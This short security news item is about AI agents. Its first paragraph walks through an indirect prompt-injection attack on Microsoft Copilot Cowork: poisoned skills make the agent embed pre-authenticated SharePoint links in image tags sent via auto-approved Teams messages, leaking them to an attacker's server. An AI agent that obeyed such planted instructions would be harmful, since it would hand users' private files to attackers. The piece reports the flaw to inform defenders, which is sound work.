Agentic Security: Copilot Exfiltration and AI Vulnerability Hunting
The rapid integration of autonomous AI agents into enterprise environments is exposing critical new security boundaries. A striking demonstration of this is a vulnerability in Microsoft Copilot Cowork, where attackers can use indirect prompt injection via poisoned "skills" (custom text-based plugins) to exfiltrate sensitive files. By exploiting Cowork's design—which automatically approves sending Teams and Outlook messages to the active user without human confirmation—an injection can force the agent to retrieve pre-authenticated SharePoint download links and embed them in malicious HTML image tags. When the user views their Teams messages, their client automatically renders the image, exfiltrating the private download links to an attacker-controlled server. This incident highlights a fundamental flaw in current LLM-agent architectures: they do not separate data from code, and granting them broad, delegable tool-calling permissions is an inherently dangerous paradigm.
Conversely, agentic workflows are also demonstrating immense power on the defensive side. Anthropic's Claude (working with the Mythos preview research team) successfully discovered a critical integer overflow vulnerability in the Apple macOS kernel (CVE-2026-28952), which was subsequently patched in macOS Tahoe 26.5. This milestone has sparked a debate on the future of software maintenance. Some engineers predict a 24/7 security arms race where dedicated agents continuously fuzz and audit codebases, forcing software publishers to either adopt a rapid "bleeding edge" update model or double down on robust Long Term Support (LTS) releases to manage the constant influx of patches.